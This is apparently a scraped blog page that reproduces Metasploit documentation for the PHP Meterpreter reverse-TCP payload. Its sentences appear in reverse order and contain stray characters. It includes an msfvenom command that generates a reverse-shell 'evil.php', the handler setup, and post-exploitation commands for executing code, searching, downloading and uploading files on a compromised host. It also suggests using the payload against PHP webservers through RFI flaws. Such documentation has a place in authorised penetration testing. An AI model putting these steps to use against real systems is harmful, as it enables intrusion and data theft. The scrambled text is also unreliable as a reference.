If you wish to get back to Meterpreter, do + to background the channel. The shell command allows you to interact with the remote machine's command prompt (or shell). The ps command lists the running processes on the remote machine. The following examples uses the command to create a text file: meterpreter > execute -f echo -a "hello > /tmp/hello.txt" The execute command allows you to execute a command or file on the remote machine. The getuid command tells you the current user that Meterpreter is running on. The -r option for the command allows you to search recursively. Without the -d option, the command will attempt to search in all drives. This shows how to find all text files in the current directory: meterpreter > search -d. The search command allows you to find files on the remote file system. download : /Users/thecarterb/Desktop/data.txt -> /tmp/pass.txt/data.txt downloading: /Users/thecarterb/Desktop/data.txt -> /tmp/pass.txt/data.txt The download command allows you to download a file from the remote target to your machine.įor example: meterpreter > download /Users/thecarterb/Desktop/data.txt /tmp/pass.txt uploaded : /tmp/data.txt -> /Users/thecarterb/Desktop/data.txt uploading : /tmp/data.txt -> /Users/thecarterb/Desktop For example: meterpreter > upload /tmp/data.txt /Users/thecarterb/Desktop This is useful for uploading additional payload files. The upload command allows you to upload a file to the remote target. The cat command allows you to see the content of a file: meterpreter > cat /tmp/data.txt Example: meterpreter > cd /Users/thecarterb/Desktop The cd command allows you to change directories. The pwd command tells you the current working directory. Has less commands, but here's a list of all the common ones you might need: Msf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcpĬompared to a native Meterpreter such as windows/meterpreter/reverse_tcp, the PHP Meterpreter Msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=4444 -f raw -o evil.php Specific demo of using the module that might be useful in a real world scenario. For example, the module can be used against webservers which run PHP code for a website. The PHP Meterpreter is suitable for any system that supports PHP. This module can be cross platform, but the target needs to be able to run php code. This is a unique payload in the Metasploit Framework because this payload is one of the only payloads that are used in RFI vulnerabilities in web apps. The php/meterpreter/reverse_tcp is a staged payload used to gain meterpreter access to a compromised system.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |